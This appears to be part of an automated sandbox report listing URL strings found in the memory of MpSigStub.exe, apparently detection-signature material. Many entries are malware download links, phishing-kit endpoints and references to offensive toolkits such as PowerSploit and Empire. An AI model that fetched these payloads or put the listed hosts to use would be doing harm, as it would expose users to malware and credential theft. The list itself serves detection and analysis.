Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: https://pjoao1578pro2.site/crypt/vbscript.txt
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://platform.jsecoin.com/?lander=1&utm_source=referral&utm_campaign=aff
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: https://playmesadelsol.com/wp-content/off/rt35.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://plectrum.sebdelaweb.com/mnmn/index.php
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://poOsKYsdcast.oigaprofe.com.mx/wp-includes/sodiumOsKYs_comOsKYspat/src/Core32/ChaCha20/KlrIU4
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://pomf.pw/files/
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: https://ppam.sslblindado.com/pande.html
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://ppds.anestesi.ulm.ac.id/wp-includes/text/diff/engine/vai/reportdhlnew2.php
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://preoccupationology.com/thisshit
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: https://pressionism.xyz/bbc.exe
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: https://pro-fit.pk/exploit.exe
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://producingemotions.es/settlementstatements242019/cgi-bin/office/index.html
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://produsedecalitate.ro/request.php
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://profdocame.co.vu/1/wp-config/storage/web.app.delve/access/draw9901/8269380-attachment-micros
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: https://provodi.com/snn/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://prt.phosagro.ru/oa_html/rf.jsp?function_id=16181&resp_id=-1&resp_appl_id=-1&security_group_i
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: https://ps.ks-voicemail.online/?e=richana.nelson
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: https://ps.outlook.com/powershell-liveid
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: https://psychedelicassistedsessions.com/f2ewq5kfmdhcsac.exe-o%appdata%
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: https://ptpb.pw/jj9a
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://pxlme.me/cytyoc4h
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: https://pypi.python.org/packages/source/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://queentour.co.id/z/s.dot
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: https://quickbooks.aeymotors.com/soft.dll
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://r0lls-r0yce.com/eft/remit.dotm?raw=true
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: https://rachelzy.com/yyyy/myoriginlogger.exe
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: https://radh.ga/konzo/change.php
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: https://ramashardware.co.za/
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: https://ramblerimport.com/hz4uhlut5au/yu.html
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: https://rapid.cerner.com:8243/clientapi/v1.0/clients/mnemonic/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/aybiota/mpbh33775/gh-pages/g9wl5dp.ttf
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/elevenpaths/ibombshell/
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/empireproject/
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/powershellmafia/powersploit/
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/sharkush/test1/master/calcush.sct
Source: MpSigStub.exe, 00000026.00000003.18333419968.00000138BCD37000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/wmitoapi/test/master/compiler.zip
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: https://rawcdn.githack.net/up.php?key=5
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: https://rb.gy/kc5b5e?#ncota
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: https://rcimshop.com/wp-config-server.php
Source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp	String found in binary or memory: https://realmjoin-backend-staging.azurewebsites.net/api/system/check
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://rebrand.ly/wiy5cm0
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://referralpays.com/aki2root/uzie/actions.php
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://reformationtheology.com/css/reportexcelnew.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://reformationtheology.com/img/reportmaersknew.php
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://register.hiramhousecamp.org/miouadthen/po1820.zip
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: https://relaja.me/qw5hlk1vcmvqb25azglzywdydxbvlmvz
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://remote.bittorrent.com
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://rewardamericanexpress.blob.core.windows.net/aexp/online.americanexpress.com0smyca
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: https://rezultmedia.com/css/reportdhlnew.php
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: https://rezultmedia.com/vendor/laravel/tinker/src/reportexcelnew.php
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://ringco.com.co/cache/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://rnatrixblade.net/nj.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://rollingrockcolumbia.com/wp-admin/admin-ajax.php
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: https://rootca.allianz.com/aapplet
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://rotf.lol/3u6d9443
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://rw.mousewinning.club/?
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/119/10080008.xml
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/119/10080009.xml
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/900/10010045.xml
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/appPrefId/affPrefId.xml
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: https://s1.ax1x.com/2020/04/28/J4Zp9S.png
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: https://s15events.azure-automation.net/webhooks?token=
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: https://s18.picofile.com/d/8435906618/a27ddc7a-8599-479b-9e19-f2fd4b1988c3/setup.exe
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: https://s3-ap-northeast-1.amazonaws.com/update-secure/asmsgrbarb.zip
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://s3-eu-west-1.amazonaws.com/adkooo/
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: https://s3.amazonaws.com/exec459/exec.tgz
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://s3.us-east-2.amazonaws.com/cotazion.pago/recibo.html
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://sad-goldwasser.62-108-34-75.plesk.page/doc00289?
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://safedental.org/wp-includes/css/report-maerskline.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://safedental.org/wp-includes/ixr/report-pdf.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://safiliti-load.com/ecm/ibm/3166347507/converter.dot
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: https://scabraldealdun.com/hghgh/aridonorigin.exe
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: https://scalet.publicvm.com/large2/next.php
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: https://scaricapag.win/eco
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://screw-malwrhunterteams.com/scanme.txt
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://sddfdfdf.typeform.com/to/vrfwamwx
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://secfile24.top/kd323jasd.php
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://secure.hotbar.com/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp	String found in binary or memory: https://secure.logmeinrescue.com/
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: https://secure.tibia.com/account/?subtopic=accountmanagement
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://securezalink.com/home.jpg/security.ocx
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://selmersax.de/wp-content/themes/rehub/bpge/front/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: https://semalt.com/popups/popup_wow.php?lang=en
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://serv.fkn-srv.xyz/?e=tom.hughes
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://server.voiplogger0365.xyz/?e=csizemore
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://seyedishop.ir/rh1/pmt.php
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: https://shaastraarth.in/bbbg/
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://shatha.n-idea.us/moo/
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: https://shop.asopalav.com/ds/0302.gif
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: https://shoplady.xyz/glsdil.php
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://shoptimes.ro/admin/clienti/opo.php
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://shreyainfosoft.com/krishnasteelcorporation/next.php
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://shreyainfosoft.com/shayonajwellers/after.php
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: https://signin.ebay
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://simetrika.com/redirect/zg9uywxklmvhdmvzqgfjy2vsbgvudc5jb20=
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://sis.ieadar.com.br-$r)r/Igreja-master/agendaSec/css/Sq4D0WfbvSitsO.php
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://skripon.com/oozoo/document.php
Source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp	String found in binary or memory: https://smartcheckautos%.com/wp%-content/%.%.%./%.%.%./x3%.php
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://smpn1kunjangkediri.sch.id/wp-content/uploads/upgrabe/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://soft-gps.com/wp-content/plugins/cvuohucwkp/tre/swt.php
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://sotheraho.com/wp-content/fonts/reportexcelnew.php
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: https://southpolefaxnet.ml/number/brand.php
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://southvomes.sozouths.xyz/?e=
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://ssl-proxy.my-addr.org/myaddrproxy.php/http://
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://ssl859.websiteseguro.com/downloadflash/dados/Juliana.jpg
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://ssl859.websiteseguro.com/downloadflash/dados/grdmody.jpg
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://ssl859.websiteseguro.com/downloadflash/dados/msnGRD.jpg
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: https://ssmdevelopers.in/4raxigaptfpm/yu.html
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://staging2.lifebiotic.com/novacms/grassandrocks.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://stampdiato.at/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://staralevator.com/anygas/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://staralevator.com/anygas/nxt.php
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://static.wixstatic.com/ugd/05e470_b104c366c1f7423293887062c7354db2.doc
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://static.wixstatic.com/ugd/859f79_35181f339d694f87870220aa3da46c30.doc
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: https://statsdev.com/header.jpg
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: https://statseast.com/login.jpg
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://statsmag.com/apple/log.php
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: https://statsper.com/footer.jpg
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: https://statssale.com/header.jpg
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://stepup.pt/sugar6/ww/s.dot
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://stitch-statichosting-prod.s3.amazonaws.com/5ffbf74f106b1ff88367ac90/5ffbf62cd17b985f24b01f73
Source: MpSigStub.exe, 00000026.00000003.18311122933.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://storage.googleapis.com/
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://storage.googleapis.com/gr-bhuj-i7uyrterwr-g6.appspot.com/vbeuryfu.com.us/bv-ury-ey-b
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: https://storage.googleapis.com/msofficeupdater/MSUpdater.exe
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://storyofusstudios.com/n75oh9tzoyhz/lipa.html
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://stretchbuilder.com/chalkzone/next.php
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: https://studio.joellemagazine.com/drms/ind.html
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: https://subahj.linkpc.net/sarah2/next.php
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://submit-form.com/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://subwaybookreview.com/vl1/sample.doc
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: https://sumnermail.org/sumnerscools/school.php
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: https://sundersls.weebly.com
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://sunilmaharjan.com.np/cve/cv.exe
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: https://surustore.com/imageY9a
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: https://sviescfze.com/iaret52086yla/next.php
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://sviescfze.com/ns735tey89dgwmo/next.php
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://sweetsizing.com/vip/
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://syr.us/gpn
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://t.me/File
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	String found in binary or memory: https://t.me/IamLev1
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	String found in binary or memory: https://t.me/IamLev1x
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://tales.pt/webmail-purchase/reportexcel.php
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: https://tapro-trgovina.com/slimneweurope/next.php
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: https://tapro-trgovina.com/yalladg/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: https://techportal.cerner.com/api/validateProjectNumber?projectNumber=
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://tecnicopconline.com/wp-admin/jekbvhub.php
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: https://tegavu.com
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://ternerdrivew.at/3/wwf.dll
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://ternerdrivew.at/3/wwf.exe
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://testweb.public360saas.se:443/biz/v2-pbr/docprod/templates/bot_tjansteskrivelse.docx
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://thecloud-jewels.com/wp-content/themes/storefront/inc/admin/ms
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://themexoneonline.me/ctkjghgvjtfchgdgdmcmgcxgfxfxfxngcthgcnhtgctgcgcm/hzvzdfbjzbfjbfbb43534wbt
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://themexoneonline.me/timack/rt456475888y8y98yhvhh657467hvkffyufkhmvvhvchcvvmvce7ti7t4irgsejgxr
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://thephotographersworkflow.com/vv/popi.exe
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://thersshy.dynssl.com//
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://thersshy.dynssl.com//post.php
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://thewatch-tv.com/guyofficeaprof/post.php
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: https://tiagogalindo.com.br/1/ksu/index.html
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: https://timbeck.net/redirect/ywxpbmeuc2vyymfulwjhcmj1qgrpbnvszwdhbc5ybw==
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/bptvnhw6
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/j7tx7h8)
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/up77pck
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/y7rku84vscrobj.dll
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/yaozbad7
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://todayutos.info
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://tomamate.si/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://toulousa.com/omg/rockspa.php
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: https://tph786.com/gym/assets/css/
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://tr.im/1azmq)
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: https://track.fourtiz.com
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: https://tradingdashboards.com/
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	String found in binary or memory: https://trafffi.ru/123?utm_term=
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	String found in binary or memory: https://trafffi.ru/aws?utm_term=
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: https://trafffi.ru/shook?utm_term=
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: https://trafffi.ru/strik?utm_term=
